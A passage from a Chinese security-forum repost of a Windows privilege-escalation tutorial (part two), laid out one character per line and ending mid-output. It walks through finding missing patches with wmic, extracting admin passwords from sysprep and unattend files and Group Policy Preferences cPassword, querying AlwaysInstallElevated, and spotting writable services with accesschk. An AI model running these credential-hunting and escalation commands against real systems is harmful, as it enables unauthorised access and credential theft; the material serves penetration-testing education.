论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[19490] 2019-05-30_【白帽子必看】Windows提权基本原理(下)
文档创建者:
s7ckTeam
浏览次数:
23
最后更新:
2025-01-18
渗透测试
23 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2019-05-30_【白帽子必看】Windows提权基本原理(下)
【
白
帽
子
必
看
】
W
i
n
d
o
w
s
提
权
基
本
原
理
(
下
)
i
春
秋
2
0
1
9
-
0
5
-
3
0
【
白
帽
子
必
看
】
W
i
n
d
o
w
s
提
权
基
本
原
理
(
上
)
姿
势
已
摆
好
就
等
你
点
啦
上
一
篇
文
章
我
们
介
绍
了
信
息
收
集
方
法
和
W
M
I
C
,
今
天
我
们
将
跟
随
作
者
深
入
学
习
W
i
n
d
o
w
s
提
权
基
本
原
理
的
内
容
,
希
望
通
过
这
两
篇
文
章
的
讲
解
,
大
家
能
够
真
正
掌
握
这
个
技
能
。
注
:
文
章
篇
幅
较
长
,
阅
读
用
时
约
1
0
分
钟
。
在
继
续
渗
透
之
前
,
你
需
要
先
回
顾
一
下
已
经
搜
集
到
的
信
息
,
信
息
量
应
该
已
经
不
小
了
。
我
们
计
划
的
下
一
步
就
是
要
寻
找
一
些
能
被
轻
易
利
用
的
系
统
缺
陷
来
提
升
权
限
。
上
期
回
顾
上
期
回
顾
在
t
5
-
t
6
阶
段
,
快
速
攻
陷
显
而
易
见
,
第
一
步
就
是
去
查
看
补
丁
修
正
情
况
。
如
果
发
现
主
机
已
经
被
打
了
某
些
补
丁
,
也
不
用
很
担
心
。
我
的
W
M
I
C
脚
本
可
以
列
出
所
有
已
安
装
的
补
丁
,
你
可
以
通
过
下
面
这
条
命
令
来
查
看
:
但
这
些
输
出
并
不
代
表
一
定
可
以
被
利
用
,
最
好
的
策
略
先
是
去
寻
找
可
以
提
升
权
限
的
E
X
P
以
及
它
们
的
补
丁
编
号
。
这
些
E
X
P
包
括
但
不
限
于
:
K
i
T
r
a
p
0
D
(
K
B
9
7
9
6
8
2
)
,
M
S
1
1
-
0
1
1
(
K
B
2
3
9
3
8
0
2
)
,
M
S
1
0
-
0
5
9
(
K
B
9
8
2
7
9
9
)
,
M
S
1
0
-
0
2
1
(
K
B
9
7
9
6
8
3
)
,
M
S
1
1
-
0
8
0
(
K
B
2
5
9
2
7
9
9
)
。
在
列
举
了
系
统
版
本
和
补
丁
包
后
,
你
应
该
发
现
哪
些
权
限
提
升
漏
洞
可
以
被
复
现
,
使
用
补
丁
包
编
号
你
可
以
过
滤
掉
那
些
已
经
被
安
装
的
补
丁
,
检
查
一
下
是
否
有
被
漏
打
的
补
丁
。
以
下
是
对
补
丁
包
进
行
过
滤
的
语
法
:
接
下
来
我
们
将
会
有
很
多
新
发
现
。
一
般
情
况
下
,
如
果
需
要
给
很
多
机
器
配
置
同
一
个
环
境
,
一
个
技
术
人
员
一
定
不
会
逐
个
安
装
配
置
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
>
w
m
i
c
q
f
e
g
e
t
C
a
p
t
i
o
n
,
D
e
s
c
r
i
p
t
i
o
n
,
H
o
t
F
i
x
I
D
,
I
n
s
t
a
l
l
e
d
O
n
C
a
p
t
i
o
n
D
e
s
c
r
i
p
t
i
o
n
H
o
t
F
i
x
I
D
I
n
s
t
a
l
l
e
d
O
n
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
2
7
5
2
8
S
e
c
u
r
i
t
y
U
p
d
a
t
e
K
B
2
7
2
7
5
2
8
1
1
/
2
3
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
2
9
4
6
2
S
e
c
u
r
i
t
y
U
p
d
a
t
e
K
B
2
7
2
9
4
6
2
1
1
/
2
6
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
3
6
6
9
3
S
e
c
u
r
i
t
y
U
p
d
a
t
e
K
B
2
7
3
6
6
9
3
1
1
/
2
6
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
3
7
0
8
4
S
e
c
u
r
i
t
y
U
p
d
a
t
e
K
B
2
7
3
7
0
8
4
1
1
/
2
3
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
4
2
6
1
4
S
e
c
u
r
i
t
y
U
p
d
a
t
e
K
B
2
7
4
2
6
1
4
1
1
/
2
3
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
4
2
6
1
6
S
e
c
u
r
i
t
y
U
p
d
a
t
e
K
B
2
7
4
2
6
1
6
1
1
/
2
6
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
5
0
1
4
9
U
p
d
a
t
e
K
B
2
7
5
0
1
4
9
1
1
/
2
3
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
5
6
8
7
2
U
p
d
a
t
e
K
B
2
7
5
6
8
7
2
1
1
/
2
4
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
5
6
9
2
3
S
e
c
u
r
i
t
y
U
p
d
a
t
e
K
B
2
7
5
6
9
2
3
1
1
/
2
6
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
5
7
6
3
8
S
e
c
u
r
i
t
y
U
p
d
a
t
e
K
B
2
7
5
7
6
3
8
1
1
/
2
3
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
5
8
2
4
6
U
p
d
a
t
e
K
B
2
7
5
8
2
4
6
1
1
/
2
4
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
6
1
0
9
4
U
p
d
a
t
e
K
B
2
7
6
1
0
9
4
1
1
/
2
4
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
6
4
8
7
0
U
p
d
a
t
e
K
B
2
7
6
4
8
7
0
1
1
/
2
4
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
6
8
7
0
3
U
p
d
a
t
e
K
B
2
7
6
8
7
0
3
1
1
/
2
3
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
6
9
0
3
4
U
p
d
a
t
e
K
B
2
7
6
9
0
3
4
1
1
/
2
3
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
6
9
1
6
5
U
p
d
a
t
e
K
B
2
7
6
9
1
6
5
1
1
/
2
3
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
6
9
1
6
6
U
p
d
a
t
e
K
B
2
7
6
9
1
6
6
1
1
/
2
6
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
7
0
6
6
0
S
e
c
u
r
i
t
y
U
p
d
a
t
e
K
B
2
7
7
0
6
6
0
1
1
/
2
3
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
7
0
9
1
7
U
p
d
a
t
e
K
B
2
7
7
0
9
1
7
1
1
/
2
4
/
2
0
1
3
h
t
t
p
:
/
/
s
u
p
p
o
r
t
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
?
k
b
i
d
=
2
7
7
1
8
2
1
U
p
d
a
t
e
K
B
2
7
7
1
8
2
1
1
1
/
2
4
/
2
0
1
3
[
.
.
S
n
i
p
.
.
]
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
>
w
m
i
c
q
f
e
g
e
t
C
a
p
t
i
o
n
,
D
e
s
c
r
i
p
t
i
o
n
,
H
o
t
F
i
x
I
D
,
I
n
s
t
a
l
l
e
d
O
n
|
f
i
n
d
s
t
r
/
C
:
"
K
B
.
.
"
/
C
:
"
K
B
.
.
"
这
些
机
器
,
而
是
会
选
择
一
些
自
动
化
安
装
的
解
决
方
案
。
这
些
方
案
是
什
么
以
及
它
们
是
如
何
工
作
的
与
我
们
当
下
所
做
的
事
情
关
联
度
不
大
,
重
要
的
是
他
们
留
下
的
用
于
安
装
流
程
的
配
置
文
件
,
这
些
配
置
文
件
包
含
大
量
的
敏
感
信
息
,
例
如
操
作
系
统
的
产
品
密
钥
和
管
理
员
密
码
。
而
我
们
最
最
感
兴
趣
的
就
是
管
理
员
密
码
,
因
为
我
们
可
以
借
此
来
提
权
。
以
下
是
一
些
经
常
被
用
于
存
放
配
置
文
件
的
位
置
(
当
然
检
查
整
个
系
统
也
是
可
以
的
)
这
些
目
录
中
的
文
件
可
能
包
含
着
明
文
密
码
,
或
是
B
a
s
e
6
4
加
密
后
的
密
码
。
下
面
是
一
些
文
件
中
的
样
例
:
c
:
s
y
s
p
r
e
p
.
i
n
f
c
:
s
y
s
p
r
e
p
s
y
s
p
r
e
p
.
x
m
l
%
W
I
N
D
I
R
%
P
a
n
t
h
e
r
U
n
a
t
t
e
n
d
U
n
a
t
t
e
n
d
e
d
.
x
m
l
%
W
I
N
D
I
R
%
P
a
n
t
h
e
r
U
n
a
t
t
e
n
d
e
d
.
x
m
l
在
B
e
n
C
a
m
p
b
e
l
l
(
@
M
e
a
t
b
a
l
l
s
_
_
)
的
推
荐
下
,
我
将
获
取
组
策
略
首
选
项
(
G
r
o
u
p
P
o
l
i
c
y
P
r
e
f
e
r
e
n
c
e
s
)
保
存
的
密
码
也
作
为
快
速
攻
陷
目
标
机
器
的
方
式
之
一
。
组
策
略
首
选
项
文
件
可
以
被
用
于
去
创
建
域
内
主
机
的
本
地
用
户
。
如
果
你
控
制
的
机
器
被
连
接
到
一
个
域
内
,
那
么
去
查
找
一
下
存
储
在
S
Y
S
V
O
L
中
的
G
r
o
u
p
s
.
x
m
l
文
件
也
是
很
有
意
义
的
,
而
且
所
有
被
授
权
的
用
户
都
有
该
文
件
的
读
权
限
。
在
这
个
x
m
l
文
件
中
的
密
码
只
是
被
临
时
用
户
“
模
糊
”
地
用
A
E
S
加
密
了
,
说
“
模
糊
”
是
因
为
静
态
密
钥
已
经
被
公
开
的
公
布
于
m
s
d
n
网
站
上
,
所
以
可
以
轻
松
地
破
解
这
些
密
码
。
除
了
G
r
o
u
p
s
.
x
m
l
还
有
几
个
其
他
的
策
略
首
选
项
文
件
也
同
样
含
有
可
选
的
“
c
P
a
s
s
w
o
r
d
”
属
性
:
#
T
h
i
s
i
s
a
s
a
m
p
l
e
f
r
o
m
s
y
s
p
r
e
p
.
i
n
f
w
i
t
h
c
l
e
a
r
-
t
e
x
t
c
r
e
d
e
n
t
i
a
l
s
.
[
G
u
i
U
n
a
t
t
e
n
d
e
d
]
O
E
M
S
k
i
p
R
e
g
i
o
n
a
l
=
1
O
e
m
S
k
i
p
W
e
l
c
o
m
e
=
1
A
d
m
i
n
P
a
s
s
w
o
r
d
=
s
3
c
r
3
t
p
4
s
s
w
0
r
d
T
i
m
e
Z
o
n
e
=
2
0
#
T
h
i
s
i
s
a
s
a
m
p
l
e
f
r
o
m
s
y
s
p
r
e
p
.
x
m
l
w
i
t
h
B
a
s
e
6
4
"
e
n
c
o
d
e
d
"
c
r
e
d
e
n
t
i
a
l
s
.
P
l
e
a
s
e
p
e
o
p
l
e
B
a
s
e
6
4
i
s
n
o
t
e
n
c
r
y
p
t
i
o
n
,
I
t
a
k
e
m
o
r
e
p
r
e
c
a
u
t
i
o
n
s
t
o
p
r
o
t
e
c
t
m
y
c
o
f
f
e
e
.
T
h
e
p
a
s
s
w
o
r
d
h
e
r
e
i
s
"
S
u
p
e
r
S
e
c
u
r
e
P
a
s
s
w
o
r
d
"
.
<
L
o
c
a
l
A
c
c
o
u
n
t
s
>
<
L
o
c
a
l
A
c
c
o
u
n
t
w
c
m
:
a
c
t
i
o
n
=
"
a
d
d
"
>
<
P
a
s
s
w
o
r
d
>
<
V
a
l
u
e
>
U
3
V
w
Z
X
J
T
Z
W
N
1
c
m
V
Q
Y
X
N
z
d
2
9
y
Z
A
=
=
<
/
V
a
l
u
e
>
<
P
l
a
i
n
T
e
x
t
>
f
a
l
s
e
<
/
P
l
a
i
n
T
e
x
t
>
<
/
P
a
s
s
w
o
r
d
>
<
D
e
s
c
r
i
p
t
i
o
n
>
L
o
c
a
l
A
d
m
i
n
i
s
t
r
a
t
o
r
<
/
D
e
s
c
r
i
p
t
i
o
n
>
<
D
i
s
p
l
a
y
N
a
m
e
>
A
d
m
i
n
i
s
t
r
a
t
o
r
<
/
D
i
s
p
l
a
y
N
a
m
e
>
<
G
r
o
u
p
>
A
d
m
i
n
i
s
t
r
a
t
o
r
s
<
/
G
r
o
u
p
>
<
N
a
m
e
>
A
d
m
i
n
i
s
t
r
a
t
o
r
<
/
N
a
m
e
>
<
/
L
o
c
a
l
A
c
c
o
u
n
t
>
<
/
L
o
c
a
l
A
c
c
o
u
n
t
s
>
#
S
a
m
p
l
e
f
r
o
m
U
n
a
t
t
e
n
d
e
d
.
x
m
l
w
i
t
h
t
h
e
s
a
m
e
"
s
e
c
u
r
e
"
B
a
s
e
6
4
e
n
c
o
d
i
n
g
.
<
A
u
t
o
L
o
g
o
n
>
<
P
a
s
s
w
o
r
d
>
<
V
a
l
u
e
>
U
3
V
w
Z
X
J
T
Z
W
N
1
c
m
V
Q
Y
X
N
z
d
2
9
y
Z
A
=
=
<
/
V
a
l
u
e
>
<
P
l
a
i
n
T
e
x
t
>
f
a
l
s
e
<
/
P
l
a
i
n
T
e
x
t
>
<
/
P
a
s
s
w
o
r
d
>
<
E
n
a
b
l
e
d
>
t
r
u
e
<
/
E
n
a
b
l
e
d
>
<
U
s
e
r
n
a
m
e
>
A
d
m
i
n
i
s
t
r
a
t
o
r
<
/
U
s
e
r
n
a
m
e
>
<
/
A
u
t
o
L
o
g
o
n
>
这
个
漏
洞
可
以
通
过
手
动
浏
览
S
Y
S
V
O
L
文
件
夹
和
抓
取
相
关
文
件
来
利
用
,
证
明
如
下
:
然
而
,
我
们
都
希
望
有
一
个
自
动
化
的
解
决
方
案
,
这
样
我
们
就
可
以
尽
可
能
快
的
完
成
这
项
工
作
。
这
里
主
要
有
两
种
方
式
,
取
决
于
我
们
的
s
h
e
l
l
类
型
以
及
权
限
大
小
:
一
个
是
通
过
已
建
立
的
会
话
执
行
m
e
t
a
s
p
l
o
i
t
模
块
;
你
可
以
使
用
P
o
w
e
r
S
p
l
o
i
t
的
G
e
t
-
G
P
P
P
a
s
s
w
o
r
d
功
能
。
P
o
w
e
r
S
p
l
o
i
t
是
一
个
强
大
的
p
o
w
e
r
s
h
e
l
l
框
架
,
作
者
是
M
a
t
t
G
r
a
e
b
e
r
(
擅
长
逆
向
工
程
、
计
算
机
取
证
以
及
渗
透
测
试
)
。
接
下
来
我
们
要
查
找
一
个
奇
怪
的
注
册
表
设
置
项
“
A
l
w
a
y
s
I
n
s
t
a
l
l
E
l
e
v
a
t
e
d
”
,
如
果
该
设
置
项
被
启
用
,
它
会
允
许
任
何
权
限
的
用
户
以
N
T
A
U
T
H
O
R
I
T
Y
S
Y
S
T
E
M
权
限
来
安
装
*
.
m
s
i
文
件
。
可
以
创
建
低
权
限
的
用
户
(
它
们
的
操
作
系
统
使
用
受
到
限
制
)
但
是
却
给
它
们
S
Y
S
T
E
M
权
限
去
安
装
软
件
,
这
在
我
看
来
是
有
些
奇
怪
。
想
要
阅
读
更
多
的
这
方
面
的
背
景
知
识
,
可
以
查
看
这
里
,
这
是
在
G
r
e
y
H
a
t
H
a
c
k
e
r
博
客
上
P
a
r
v
e
z
的
一
篇
文
章
,
他
最
早
报
告
了
这
个
安
全
问
题
。
为
了
能
利
用
这
个
漏
洞
,
我
们
需
要
去
检
查
两
个
注
册
表
键
值
是
否
被
设
置
,
这
是
我
们
是
否
能
弹
出
S
Y
S
T
E
M
权
限
s
h
e
l
l
的
关
键
。
以
下
是
查
询
对
应
注
册
表
键
值
的
语
法
:
为
了
完
成
这
个
章
节
,
我
们
还
将
在
操
作
系
统
上
做
一
些
快
速
搜
索
,
希
望
我
们
可
以
成
功
。
执
行
以
下
语
句
完
成
搜
索
:
S
e
r
v
i
c
e
s
S
e
r
v
i
c
e
s
.
x
m
l
:
E
l
e
m
e
n
t
-
S
p
e
c
i
f
i
c
A
t
t
r
i
b
u
t
e
s
S
c
h
e
d
u
l
e
d
T
a
s
k
s
S
c
h
e
d
u
l
e
d
T
a
s
k
s
.
x
m
l
:
T
a
s
k
I
n
n
e
r
E
l
e
m
e
n
t
,
T
a
s
k
V
2
I
n
n
e
r
E
l
e
m
e
n
t
,
I
m
m
e
d
i
a
t
e
T
a
s
k
V
2
I
n
n
e
r
E
l
e
m
e
n
t
P
r
i
n
t
e
r
s
P
r
i
n
t
e
r
s
.
x
m
l
:
S
h
a
r
e
d
P
r
i
n
t
e
r
E
l
e
m
e
n
t
D
r
i
v
e
s
D
r
i
v
e
s
.
x
m
l
:
E
l
e
m
e
n
t
-
S
p
e
c
i
f
i
c
A
t
t
r
i
b
u
t
e
s
D
a
t
a
S
o
u
r
c
e
s
D
a
t
a
S
o
u
r
c
e
s
.
x
m
l
:
E
l
e
m
e
n
t
-
S
p
e
c
i
f
i
c
A
t
t
r
i
b
u
t
e
s
#
只
有
当
注
册
表
项
中
存
在
键
值
"
A
l
w
a
y
s
I
n
s
t
a
l
l
E
l
e
v
a
t
e
d
"
且
其
D
W
O
R
D
值
为
1
时
才
会
有
效
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
>
r
e
g
q
u
e
r
y
H
K
L
M
S
O
F
T
W
A
R
E
P
o
l
i
c
i
e
s
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
I
n
s
t
a
l
l
e
r
A
l
w
a
y
s
I
n
s
t
a
l
l
E
l
e
v
a
t
e
d
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
>
r
e
g
q
u
e
r
y
H
K
C
U
S
O
F
T
W
A
R
E
P
o
l
i
c
i
e
s
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
I
n
s
t
a
l
l
e
r
A
l
w
a
y
s
I
n
s
t
a
l
l
E
l
e
v
a
t
e
d
希
望
到
现
在
为
止
,
我
们
已
经
有
了
一
个
S
Y
S
T
E
M
s
h
e
l
l
,
但
如
果
我
们
还
没
有
,
接
下
来
还
有
一
些
方
法
可
以
尝
试
。
在
最
后
章
节
我
们
将
会
关
注
于
W
i
n
d
o
w
s
服
务
和
文
件
/
目
录
权
限
部
分
。
我
们
的
目
标
是
去
使
用
低
权
限
去
提
升
当
前
会
话
权
限
。
我
们
将
会
检
查
很
多
访
问
权
限
,
所
以
我
们
应
该
抓
取
一
份
微
软
S
y
s
i
n
t
e
r
n
a
l
s
套
件
中
a
c
c
e
s
s
c
h
k
.
e
x
e
工
具
的
副
本
。
微
软
S
y
s
i
n
t
e
r
n
a
l
s
套
件
包
含
了
许
多
强
大
的
工
具
,
但
微
软
并
没
有
把
它
们
加
入
标
准
版
的
W
i
n
d
o
w
s
。
你
可
以
从
微
软
t
e
c
h
n
e
t
网
站
下
载
该
套
件
。
我
们
将
会
先
从
W
i
n
d
o
w
s
开
启
的
服
务
来
寻
找
线
索
,
因
为
那
里
可
以
发
现
很
多
快
速
制
胜
的
方
法
。
通
常
来
说
,
现
代
操
作
系
统
不
会
包
含
存
在
漏
洞
的
服
务
。
在
这
种
情
况
下
,
漏
洞
指
的
是
我
们
可
以
重
新
配
置
的
服
务
参
数
。
W
i
n
d
o
w
s
服
务
有
点
像
应
用
程
序
的
快
捷
键
,
下
面
是
一
个
例
子
:
#
T
h
e
c
o
m
m
a
n
d
b
e
l
o
w
w
i
l
l
s
e
a
r
c
h
t
h
e
f
i
l
e
s
y
s
t
e
m
f
o
r
f
i
l
e
n
a
m
e
s
c
o
n
t
a
i
n
i
n
g
c
e
r
t
a
i
n
k
e
y
w
o
r
d
s
.
Y
o
u
c
a
n
s
p
e
c
i
f
y
a
s
m
a
n
y
k
e
y
w
o
r
d
s
a
s
y
o
u
w
i
s
h
.
#
这
条
语
句
可
以
搜
索
指
定
含
有
任
意
多
关
键
字
的
文
件
名
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
>
d
i
r
/
s
*
p
a
s
s
*
=
=
*
c
r
e
d
*
=
=
*
v
n
c
*
=
=
*
.
c
o
n
f
i
g
*
#
S
e
a
r
c
h
c
e
r
t
a
i
n
f
i
l
e
t
y
p
e
s
f
o
r
a
k
e
y
w
o
r
d
,
t
h
i
s
c
a
n
g
e
n
e
r
a
t
e
a
l
o
t
o
f
o
u
t
p
u
t
.
#
用
关
键
词
搜
索
精
确
的
文
件
类
型
,
这
个
操
作
可
能
造
成
大
量
的
输
出
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
>
f
i
n
d
s
t
r
/
s
i
p
a
s
s
w
o
r
d
*
.
x
m
l
*
.
i
n
i
*
.
t
x
t
#
S
i
m
i
l
a
r
l
y
t
h
e
t
w
o
c
o
m
m
a
n
d
s
b
e
l
o
w
c
a
n
b
e
u
s
e
d
t
o
g
r
e
p
t
h
e
r
e
g
i
s
t
r
y
f
o
r
k
e
y
w
o
r
d
s
,
i
n
t
h
i
s
c
a
s
e
"
p
a
s
s
w
o
r
d
"
.
#
以
下
两
个
命
令
被
用
于
查
找
带
有
关
键
词
的
注
册
表
项
,
样
例
中
查
询
的
关
键
词
是
"
p
a
s
s
w
o
r
d
"
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
>
r
e
g
q
u
e
r
y
H
K
L
M
/
f
p
a
s
s
w
o
r
d
/
t
R
E
G
_
S
Z
/
s
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
>
r
e
g
q
u
e
r
y
H
K
C
U
/
f
p
a
s
s
w
o
r
d
/
t
R
E
G
_
S
Z
/
s
在
t
7
-
t
1
0
阶
段
,
耐
心
踏
实
和
努
力
我
们
可
以
使
用
a
c
c
e
s
s
c
h
k
检
查
每
一
个
服
务
的
权
限
。
#
W
e
c
a
n
u
s
e
s
c
t
o
q
u
e
r
y
,
c
o
n
f
i
g
u
r
e
a
n
d
m
a
n
a
g
e
w
i
n
d
o
w
s
s
e
r
v
i
c
e
s
.
#
我
们
可
以
使
用
s
c
去
查
询
、
配
置
、
管
理
W
i
n
d
o
w
s
服
务
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
>
s
c
q
c
S
p
o
o
l
e
r
[
S
C
]
Q
u
e
r
y
S
e
r
v
i
c
e
C
o
n
f
i
g
S
U
C
C
E
S
S
S
E
R
V
I
C
E
_
N
A
M
E
:
S
p
o
o
l
e
r
T
Y
P
E
:
1
1
0
W
I
N
3
2
_
O
W
N
_
P
R
O
C
E
S
S
(
i
n
t
e
r
a
c
t
i
v
e
)
S
T
A
R
T
_
T
Y
P
E
:
2
A
U
T
O
_
S
T
A
R
T
E
R
R
O
R
_
C
O
N
T
R
O
L
:
1
N
O
R
M
A
L
B
I
N
A
R
Y
_
P
A
T
H
_
N
A
M
E
:
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
s
p
o
o
l
s
v
.
e
x
e
L
O
A
D
_
O
R
D
E
R
_
G
R
O
U
P
:
S
p
o
o
l
e
r
G
r
o
u
p
T
A
G
:
0
D
I
S
P
L
A
Y
_
N
A
M
E
:
P
r
i
n
t
S
p
o
o
l
e
r
D
E
P
E
N
D
E
N
C
I
E
S
:
R
P
C
S
S
:
h
t
t
p
S
E
R
V
I
C
E
_
S
T
A
R
T
_
N
A
M
E
:
L
o
c
a
l
S
y
s
t
e
m
A
c
c
e
s
s
c
h
k
可
以
自
动
化
的
检
测
我
们
是
否
拥
有
一
个
W
i
n
d
o
w
s
服
务
的
写
入
访
问
权
限
。
作
为
一
个
低
权
限
用
户
,
我
们
通
常
希
望
检
查
结
果
为
“
A
u
t
h
e
n
t
i
c
a
t
e
d
U
s
e
r
s
”
。
一
定
要
去
检
查
你
的
用
户
属
于
哪
个
用
户
组
,
举
个
例
子
,
“
P
o
w
e
r
U
s
e
r
s
”
被
认
为
是
一
个
低
权
限
用
户
组
(
尽
管
它
没
有
被
广
泛
使
用
)
。
一
起
来
比
较
一
下
在
W
i
n
d
o
w
s
8
和
W
i
n
d
o
w
s
X
P
S
P
0
上
输
出
的
不
同
:
#
W
e
c
a
n
s
e
e
t
h
e
p
e
r
m
i
s
s
i
o
n
s
t
h
a
t
e
a
c
h
u
s
e
r
l
e
v
e
l
h
a
s
,
y
o
u
c
a
n
a
l
s
o
u
s
e
"
a
c
c
e
s
s
c
h
k
.
e
x
e
-
u
c
q
v
*
"
t
o
l
i
s
t
a
l
l
s
e
r
v
i
c
e
s
.
C
:
>
a
c
c
e
s
s
c
h
k
.
e
x
e
-
u
c
q
v
S
p
o
o
l
e
r
S
p
o
o
l
e
r
R
N
T
A
U
T
H
O
R
I
T
Y
A
u
t
h
e
n
t
i
c
a
t
e
d
U
s
e
r
s
S
E
R
V
I
C
E
_
Q
U
E
R
Y
_
S
T
A
T
U
S
S
E
R
V
I
C
E
_
Q
U
E
R
Y
_
C
O
N
F
I
G
S
E
R
V
I
C
E
_
I
N
T
E
R
R
O
G
A
T
E
S
E
R
V
I
C
E
_
E
N
U
M
E
R
A
T
E
_
D
E
P
E
N
D
E
N
T
S
S
E
R
V
I
C
E
_
U
S
E
R
_
D
E
F
I
N
E
D
_
C
O
N
T
R
O
L
R
E
A
D
_
C
O
N
T
R
O
L
R
B
U
I
L
T
I
N
P
o
w
e
r
U
s
e
r
s
S
E
R
V
I
C
E
_
Q
U
E
R
Y
_
S
T
A
T
U
S
S
E
R
V
I
C
E
_
Q
U
E
R
Y
_
C
O
N
F
I
G
S
E
R
V
I
C
E
_
I
N
T
E
R
R
O
G
A
T
E
S
E
R
V
I
C
E
_
E
N
U
M
E
R
A
T
E
_
D
E
P
E
N
D
E
N
T
S
S
E
R
V
I
C
E
_
S
T
A
R
T
S
E
R
V
I
C
E
_
U
S
E
R
_
D
E
F
I
N
E
D
_
C
O
N
T
R
O
L
R
E
A
D
_
C
O
N
T
R
O
L
R
W
B
U
I
L
T
I
N
A
d
m
i
n
i
s
t
r
a
t
o
r
s
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
R
W
N
T
A
U
T
H
O
R
I
T
Y
S
Y
S
T
E
M
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
这
个
问
题
在
之
后
的
X
P
S
P
2
版
本
中
得
到
了
解
决
,
然
而
在
S
P
0
和
S
P
1
它
可
以
被
用
作
一
个
通
用
的
本
地
提
权
漏
洞
。
通
过
重
新
配
置
该
服
务
,
我
们
可
以
让
它
以
S
Y
S
T
E
M
权
限
运
行
任
何
我
们
指
定
的
二
进
制
文
件
。
#
T
h
i
s
i
s
o
n
W
i
n
d
o
w
s
8
.
C
:
U
s
e
r
s
b
3
3
f
t
o
o
l
s
S
y
s
i
n
t
e
r
n
a
l
s
>
a
c
c
e
s
s
c
h
k
.
e
x
e
-
u
w
c
q
v
"
A
u
t
h
e
n
t
i
c
a
t
e
d
U
s
e
r
s
"
*
N
o
m
a
t
c
h
i
n
g
o
b
j
e
c
t
s
f
o
u
n
d
.
#
O
n
a
d
e
f
a
u
l
t
W
i
n
d
o
w
s
X
P
S
P
0
w
e
c
a
n
s
e
e
t
h
e
r
e
i
s
a
p
r
e
t
t
y
b
i
g
s
e
c
u
r
i
t
y
f
a
i
l
.
C
:
>
a
c
c
e
s
s
c
h
k
.
e
x
e
-
u
w
c
q
v
"
A
u
t
h
e
n
t
i
c
a
t
e
d
U
s
e
r
s
"
*
R
W
S
S
D
P
S
R
V
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
R
W
u
p
n
p
h
o
s
t
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
C
:
>
a
c
c
e
s
s
c
h
k
.
e
x
e
-
u
c
q
v
S
S
D
P
S
R
V
S
S
D
P
S
R
V
R
W
N
T
A
U
T
H
O
R
I
T
Y
S
Y
S
T
E
M
S
E
R
V
I
C
E
_
A
L
